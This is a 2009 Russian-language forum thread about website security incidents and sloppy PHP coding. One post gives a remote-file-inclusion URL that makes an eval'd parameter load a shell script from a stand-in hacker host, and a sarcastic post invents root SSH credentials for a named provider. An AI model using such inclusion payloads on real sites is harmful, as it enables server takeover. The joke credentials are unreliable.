|
|
Знаете ли Вы, что ... | |
...до того как открыть новую тему, стоит использовать поиск: такая тема уже может существовать. | |
<< Предыдущий совет - Случайный совет - Следующий совет >> |
Инциденты Обсуждение произошедших инцидентов информационной безопасности |
Ответить |
|
Опции темы | Опции просмотра |
18.06.2009 23:11 | #21 | |||
Сообщений: 28
+ 1
4/2
– 0
1/1
|
Цитата:
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную... Но как только я глянул в код, я ахнул!!!! он решил засунуть переменную под евал PHP код:
http://test.ru/index.php?test=http://xak/shell.php Вот вам и самописные двиги которые трудно ломать =D А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки... |
|||
|
Ответить |
Реклама и уведомления | |
20.06.2009 05:40 | #23 | |
Сообщений: 28
+ 1
4/2
– 0
1/1
|
Цитата:
У веб серверов логики не какой нету, это искусственный разум =) Максимум что вы сможете сделать на веб сервере это урезать права на выполнение скриптов, а дырки то все равно останутся, и заметьте новые фильтры на обход защиты появляются все чаще и чаще. |
|
|
Ответить |
22.06.2009 14:54 | #24 |
Интересно получается - людям больше интересно не как защитить сайт, а как его могут сломать
Сломать могут по разному - нет универсальной защиты. Если програмист грамотный и админ не ленивый - то школяры уже не сломают, только профи - но какому профи будет интересен узбекский сайт ? Имхо ИКТ в нашей стране еще настолько не развит что получить выгоду от "ломки" никто не сможет, а профи ради спортивного интереса не ломают. Тем паче что сейчас Китай дает такие ресурсы и мощности, что даже дидосеры перестали ломать обычные сайты. Если не лень - обычно все стараются банить весь китайский диапазон адресов - обычно лезут оттуда, а обывателю из Китая - нечего делать на наших сайтах.
__________________
Size does matter.... |
|
|
Ответить |
11.09.2009 11:52 | #25 |
Не думаю что такой ресурс нужен. И без него навалом баг трекеров и прочего. В общей сложности методы взлома однообразны, достаточно почитать общие статьи на эти темы коих в нете навалом и применить их к своим реалиям, а также внимательно следить за баг трекерами используемого программного обеспечения, и не ленится что-то делать, ужасно много взломов из за элементарной лени (не стали дописывать пару строчек кода для проверки, админ поленился досконально настроить права и т.д.). В 90% случаев этого будет достаточно. А другим 10% как уже было сказано Узбекистан нафиг не нужен.
|
|
|
Ответить |
11.09.2009 13:45 | #26 | ||
Цитата:
Оффтоп: ерунда, это можна писать как и для одминов, да и руководства для хакеров, можна найти где угодно, а опытом (не хакерским, а из анализа исходящего - одминским) поделиться я считаю можнаЦитата:
Оффтоп: чушь, за я извеняюсь это все делается за Ваш счет?я просто не в курсе, или Вы тут рекламу сделали? =) Последний раз редактировалось Alexandr Pavlenko; 11.09.2009 в 13:53. |
|||
|
Ответить |
11.09.2009 15:16 | #28 | |
Engineer
Сообщений: 509
+ 45
169/112
– 0
12/9
|
Цитата:
Оффтоп: это типа на сайте будет раздел такого содержания: Руководство для хакера... как взломать uzinfocom ? для этого надо подключится к серверу через ssh (putty) в ввести в login: root , а password: 86hhyqiiy564g , после авторизации сервер полностью ваш .... |
|
|
Ответить |
Реклама и уведомления | |
11.09.2009 16:03 | #29 | ||
Цитата:
Цитата:
Оффтоп: Вам бы в НУУЗе нейронные сети и искусственный интелект преподавать, спросите Николая Александровича |
|||
|
Ответить |
|